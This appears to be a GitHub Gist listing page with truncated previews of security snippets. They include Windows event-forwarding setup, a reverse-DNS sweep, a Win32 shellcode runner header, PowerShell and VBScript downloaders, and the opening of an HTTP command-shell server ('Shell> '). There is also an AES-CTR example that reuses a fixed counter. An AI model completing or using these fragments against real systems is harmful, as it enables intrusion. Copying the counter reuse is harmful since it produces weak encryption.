This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Subscription xmlns="http://schemas.microsoft.com/2006/03/windows/events/subscription"> | |
<SubscriptionId>Domain Computer Events</SubscriptionId> | |
<SubscriptionType>SourceInitiated</SubscriptionType> | |
<Description>Important Domain Controller Events</Description> | |
<Enabled>True</Enabled> | |
<Uri>http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog</Uri> | |
<ConfigurationMode>MinLatency</ConfigurationMode> | |
<Query> | |
<![CDATA[<QueryList> | |
<Query Id="0" Path="Security"> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Collector: | |
#Setting WinRM service to automatic start and running quickconfig | |
Set-Service -Name WinRM -StartupType Automatic | |
Start-Service -Name WinRM | |
winrm quickconfig -quiet | |
#Set the size of the forwarded log | |
wevtutil sl forwardedevents /ms:1000000000 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
rangeIp="" | |
for i in `seq 1 1 254`; | |
do | |
ip=$rangeIp.$i | |
#echo $ip | |
host $ip | grep "pointer"; | |
done |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
####################################### | |
# Penetration testing toolset | |
####################################### | |
apt-get update | |
apt-get upgrade -y | |
#apt-get install whois -y | |
#apt-get install curl -y | |
#apt-get install wget -y |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
############################################################## | |
# PyInstaller Win32 shellcode runner - by @mihi42 | |
# | |
# Needed software: | |
# * Python 2.7.2 from | |
# <http://www.python.org/download/releases/> | |
# * PyWin32 build 217 for Python 2.7 from | |
# <http://sourceforge.net/projects/pywin32/files/pywin32/> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$storageDir = $pwd | |
$webclient = New-Object System.Net.WebClient | |
$url = "" | |
$file = "" | |
$webclient.DownloadFile($url,$file) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
strUrl = WScript.Arguments.Item(0) | |
StrFile = Wscript.Arguments.Item(1) | |
Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 | |
Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 | |
Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 | |
Const HTTPREQUEST_PROXYSETTING_PROXY = 2 | |
Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts | |
Err.Clear |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import os | |
from Crypto.Cipher import AES | |
counter = os.urandom(16) | |
#AES keys may be 128 bits (16 bytes), 192 bits (24 bytes) or 256 bits (32 bytes) long. | |
key = os.urandom(32) | |
# AES Encrypt | |
enc = AES.new(key, AES.MODE_CTR, counter=lambda: counter) | |
encrypted = enc.encrypt("Secret") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# HTTP SERVER | |
#-------------------------------------------- | |
import BaseHTTPServer | |
import os, cgi | |
HOST_NAME = '172.16.20.201' | |
PORT_NUMBER = 80 | |
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): | |
def do_GET(s): | |
command = raw_input("Shell> ") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from winappdbg import Debug, EventHandler, System, Process | |
import sys | |
# this is the call back function | |
def YYYY( event, ra ,arg1 ,arg2, arg3): | |
# read 1 KB of the memory content | |
print process.read( arg2,1024 ) | |
class MyEventHandler( EventHandler ): | |